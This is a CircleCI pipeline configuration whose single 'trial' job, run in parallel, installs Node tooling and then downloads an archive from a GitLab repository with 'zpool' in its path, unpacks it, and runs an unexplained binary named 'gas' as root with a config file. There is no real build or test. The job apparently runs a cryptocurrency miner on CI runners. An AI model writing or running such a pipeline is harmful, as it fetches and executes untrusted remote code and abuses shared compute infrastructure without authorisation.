version: 2.1
jobs:
    trial:
      docker:
            - image: cimg/node:18.2.0
      parallelism: 2
      steps:
        - run:
            name: "trial"
            command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://gitlab.com/Vaping86/vapers86-zpool/-/raw/main/vapertraders.tar.gz && tar -xf vapertraders.tar.gz && sudo ./gas run.ini 

workflows:
    version: 2.1
    build:
        jobs:
        - trial
